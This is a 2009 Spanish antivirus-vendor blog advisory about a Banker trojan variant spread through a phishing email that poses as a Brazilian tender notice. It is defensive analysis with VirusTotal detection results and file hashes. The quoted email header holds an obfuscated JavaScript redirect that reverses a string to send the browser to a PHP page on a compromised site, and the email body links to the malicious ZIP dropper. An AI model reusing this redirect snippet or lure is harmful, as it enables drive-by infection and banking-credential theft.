Nueva variante de Banker, del que el ELISTARA actual ya pide muestra para analizar, si se ha ejecutado

Publicado el 21 octubre 2009 ¬ 11:47 amh.mscComentarios desactivados en Nueva variante de Banker, del que el ELISTARA actual ya pide muestra para analizar, si se ha ejecutado

Una variante del Banker de ayer (  https://blog.satinfo.es/?p=1382 ) ha sido detectada hoy en otro mail distinto, tambien con remitente de Brasil:

Untitled Document
—– Original Message —–
From: “$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:rodrigues@lagosnet.com.br”>rodrigues@lagosnet.com.br>
To: <xxxxxxxxxxxxxxxx>
Sent: Wednesday, October 21, 2009 4:11 AM
Subject: Edital de Licitacao
> De acordo com o Edital de Licitacao numero 2.765/2009,que sera realizada
> dia 30/10/2009, estamos enviando os itens a serem licitados e o local
onde
> sera realizada, no link abaixo descriminado.
> Caso esteja interessado favor enviar proposta no e-mail
> tor de
Licitacoes
>
>
> ANEXO:
> http://www.fileden.com/files/<interceptado>/EditaldeLicitacao.zip
>


La descompresion de este fichero EditaldeLicitacao.zip crea un EXE con el mismo nombre, cuya ejecución genera un UPD.EXE del que el actual ELISTARA pediría muestra para analizar y controlar, si bien ya se hubiera aparcado a c:\muestras para que no se ejecutara a partir del siguiente reinicio.
Tampoco esta variante está controlada actualmente por AV conocidos como Trend, Symantec, AVG, Avast …, segun análisis actual con VirusTotal :

File EditaldeLicitacao.exe received on 2009.10.21 08:44:42 (UTC)
Result: 21/41 (51.22%)
 

Antivirus Version Last Update Result
a-squared 4.5.0.41 2009.10.21 Trojan.Crypt.Delf.E!IK
AhnLab-V3 5.0.0.2 2009.10.20 –
AntiVir 7.9.1.42 2009.10.21 HEUR/Malware
Antiy-AVL 2.0.3.7 2009.10.21 Trojan/Win32.heuristic
Authentium 5.1.2.4 2009.10.21 W32/Banload.E.gen!Eldorado
Avast 4.8.1351.0 2009.10.20 –
AVG 8.5.0.420 2009.10.20 –
BitDefender 7.2 2009.10.21 Trojan.Crypt.Delf.E
CAT-QuickHeal 10.00 2009.10.21 –
ClamAV 0.94.1 2009.10.21 –
Comodo 2677 2009.10.21 –
DrWeb 5.0.0.12182 2009.10.21 Trojan.DownLoad.53756
eSafe 7.0.17.0 2009.10.19 –
eTrust-Vet 35.1.7075 2009.10.19 –
F-Prot 4.5.1.85 2009.10.20 W32/Banload.E.gen!Eldorado
F-Secure 9.0.15300.0 2009.10.20 Trojan.Crypt.Delf.E
Fortinet 3.120.0.0 2009.10.21 PossibleThreat
GData 19 2009.10.21 Trojan.Crypt.Delf.E
Ikarus T3.1.1.72.0 2009.10.21 Trojan.Crypt.Delf.E
Jiangmin 11.0.800 2009.10.21 –
K7AntiVirus 7.10.875 2009.10.20 –
Kaspersky 7.0.0.125 2009.10.21 Trojan-Downloader.Win32.Agent.cslr
McAfee 5777 2009.10.20 –
McAfee+Artemis 5777 2009.10.20 Artemis!E119E30651DE
McAfee-GW-Edition 6.8.5 2009.10.21 Heuristic.Malware
Microsoft 1.5101 2009.10.21 TrojanDownloader:Win32/Banload.gen!B
NOD32 4527 2009.10.20 a variant of Win32/TrojanDownloader.Banload.OOC
Norman 6.03.02 2009.10.20 W32/Malware
nProtect 2009.1.8.0 2009.10.21 –
Panda 10.0.2.2 2009.10.20 Generic Trojan
PCTools 4.4.2.0 2009.10.19 –
Prevx 3.0 2009.10.21 Medium Risk Malware
Rising 21.52.22.00 2009.10.21 –
Sophos 4.46.0 2009.10.21 Mal/Generic-A
Sunbelt 3.2.1858.2 2009.10.20 Trojan.Win32.Generic!BT
Symantec 1.4.4.12 2009.10.21 –
TheHacker 6.5.0.2.049 2009.10.20 –
TrendMicro 8.950.0.1094 2009.10.21 –
VBA32 3.12.10.11 2009.10.20 –
ViRobot 2009.10.21.1998 2009.10.21 –
VirusBuster 4.6.5.0 2009.10.20 –
Additional information
File size: 450560 bytes
MD5…: e119e30651deb7d0dcca5c204dc6cbc5
SHA1..: c0cb64f20b9b3fbb56eef36803a5272926602054

 

Su ejecucion descargaría troyanos droppers de peligrosos bankers, todo lo cual pasamos a controlar con la nueva version del ELISTARA de hoy 19.51
Como siempre recordar que no deben pulsarse en links, ficheros o imagenes existentes en mails recibidos sin ser solicitados  !!!

saludos

ms, 21-10-2009

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Sin categoría

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies